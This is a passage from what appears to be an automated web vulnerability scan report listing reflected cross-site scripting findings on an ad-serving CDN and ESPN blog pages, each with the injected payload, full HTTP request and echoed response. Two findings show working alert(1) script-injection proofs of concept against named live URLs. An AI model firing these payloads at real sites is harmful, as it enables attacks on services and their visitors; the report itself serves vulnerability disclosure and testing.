<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=23053cb8a';33ba26914f6%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.221. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13ac3'%3be8a5b3462de was submitted in the REST URL parameter 5. This input was echoed as 13ac3';e8a5b3462de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/013ac3'%3be8a5b3462de/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:35 GMT
Date: Sat, 26 Feb 2011 01:49:35 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=013ac3';e8a5b3462de,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.222. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53bb2'%3b1831e25c1a7 was submitted in the REST URL parameter 6. This input was echoed as 53bb2';1831e25c1a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/053bb2'%3b1831e25c1a7/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591979
Expires: Mon, 28 Mar 2011 01:49:17 GMT
Date: Sat, 26 Feb 2011 01:49:38 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,053bb2';1831e25c1a7%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.223. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 553df'%3b09d71b838b7 was submitted in the REST URL parameter 7. This input was echoed as 553df';09d71b838b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985553df'%3b09d71b838b7/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1585
Cache-Control: max-age=2591987
Expires: Mon, 28 Mar 2011 01:49:28 GMT
Date: Sat, 26 Feb 2011 01:49:41 GMT
Connection: close


var zzADS_CHAN = '203687985553df';09d71b838b7';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.224. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f3d6'%3bcc30eb8bed2 was submitted in the REST URL parameter 8. This input was echoed as 9f3d6';cc30eb8bed2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/2036879859f3d6'%3bcc30eb8bed2//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2591986
Expires: Mon, 28 Mar 2011 01:49:30 GMT
Date: Sat, 26 Feb 2011 01:49:44 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,2036879859f3d6';cc30eb8bed2%3Bi=0%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.225. http://e2.cdn.qnsr.com//cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20144456/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59e1'%3ba8fb555b141 was submitted in the REST URL parameter 9. This input was echoed as d59e1';a8fb555b141 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20144456/2305/0/0/203687985/203687985//0d59e1'%3ba8fb555b141/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1567
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:47 GMT
Date: Sat, 26 Feb 2011 01:49:47 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<iframe SRC="http://view.atdmt.com/MRT/iview/299850655/direct;wi.300;hi.250/01' + zzDate.getTime() + '?click=http://o1.qnsr.com//cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0d59e1';a8fb555b141%3Bn=203%3Bs=9542%3B' + escape(zzStr) + '%3Bk%3D" width="300" height="250" frameborder="0" border="0" marginwidth="0" marginheight="0" scrolling="no" align="top">
...[SNIP]...

3.226. http://espn.go.com/blog/new-york/hockey/category/_/name/new-jersey-devils [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /blog/new-york/hockey/category/_/name/new-jersey-devils

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6803a"><a>7c711d6e0b5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/new-york/hockey/category/_/name/new-jersey-devils6803a"><a>7c711d6e0b5 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:38 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN09
Cache-Expires: Wed, 23 Feb 2011 23:25:38 GMT
InvH: blog-new-yorkhockey
Content-Length: 33353
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hockey Blog - ESPN
...[SNIP]...
<link rel="canonical" href="http://espn.go.com/blog/new-york/hockey/category/_/name/new-jersey-devils6803a"><a>7c711d6e0b5" />
...[SNIP]...

3.227. http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-islanders [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /blog/new-york/hockey/category/_/name/new-york-islanders

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5588e"><a>6fa37241377 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/new-york/hockey/category/_/name/new-york-islanders5588e"><a>6fa37241377 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:38 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Wed, 23 Feb 2011 23:25:38 GMT
InvH: blog-new-yorkhockey
Content-Length: 33307
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hockey Blog - ESPN
...[SNIP]...
<link rel="canonical" href="http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-islanders5588e"><a>6fa37241377" />
...[SNIP]...

3.228. http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-rangers [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://espn.go.com
Path:   /blog/new-york/hockey/category/_/name/new-york-rangers

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c495"><a>c35cbec8142 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/new-york/hockey/category/_/name/new-york-rangers2c495"><a>c35cbec8142 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:20:42 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:20:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Wed, 23 Feb 2011 23:25:42 GMT
InvH: blog-new-yorkhockey
Content-Length: 35047
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hockey Blog - ESPN
...[SNIP]...
<link rel="canonical" href="http://espn.go.com/blog/new-york/hockey/category/_/name/new-york-rangers2c495"><a>c35cbec8142" />
...[SNIP]...

3.229. http://espn.go.com/blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11851"><script>alert(1)</script>c254b6c06ee was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks11851"><script>alert(1)</script>c254b6c06ee HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:19:58 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:19:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Wed, 23 Feb 2011 23:24:58 GMT
InvH: blog-new-yorkknicks
Content-Length: 69717
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Melo will wear No.
...[SNIP]...
<a href="/blog/new-yorkknicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks11851"><script>alert(1)</script>c254b6c06ee/sort/oldest">
...[SNIP]...

3.230. http://espn.go.com/blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://espn.go.com
Path:   /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3622"><script>alert(1)</script>a8a4b6f11a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/new-york/knicks/post/_/id/2851/melo-will-wear-no-7-for-the-knicks?f3622"><script>alert(1)</script>a8a4b6f11a1=1 HTTP/1.1
Host: espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; jt_time=1298497403897; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:18:21 GMT
Content-Type: text/html;charset=iso-8859-1
Last-Modified: Wed, 23 Feb 2011 23:18:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN13
Cache-Expires: Wed, 23 Feb 2011 23:23:21 GMT
InvH: blog-new-yorkknicks
Content-Length: 69328
Connection: close
X-UA-Compatible: IE=EmulateIE7
